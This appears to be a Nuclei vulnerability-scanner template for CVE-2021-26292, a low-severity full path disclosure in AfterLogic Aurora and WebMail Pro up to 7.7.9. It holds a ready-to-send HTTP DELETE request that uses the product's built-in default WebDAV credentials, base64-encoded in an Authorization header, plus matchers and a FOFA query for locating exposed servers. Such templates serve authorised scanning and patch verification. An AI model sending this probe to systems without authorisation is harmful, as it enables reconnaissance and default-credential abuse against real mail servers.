nuclei-templates/http/cves/2021/CVE-2021-26292.yaml

46 lines
1.6 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2021-26292
info:
name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure
author: johnk3r
severity: low
description: |
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and its the predefined password “caldav_public_user” allows the attacker to obtain web root path.
reference:
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26292-full-path-disclosure-vulnerability.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-26292
classification:
cve-id: CVE-2021-26292
metadata:
verified: true
max-request: 1
vendor: AfterLogic
product: AfterLogic Aurora & WebMail
fofa-query: "X-Server: AfterlogicDAVServer"
tags: cve,cve2021,afterlogic,path,disclosure,AfterLogic
http:
- raw:
- |
DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1
Host: {{Hostname}}
Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI
matchers-condition: and
matchers:
- type: word
part: body
words:
- "caldav_public_user"
- "GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
condition: and
- type: word
part: header
words:
- "application/xml"
- type: status
status:
- 404
# digest: 490a00463044022055028104fa52e53dda65cd6c1fd9a36737ccf96678fcf059579ef620ef78fd70022024bc13dfdffbb91e551a6ed0049638444de819870faef2b8ad3f8cf5cee035e7:922c64590222798bb761d5b6d8e72950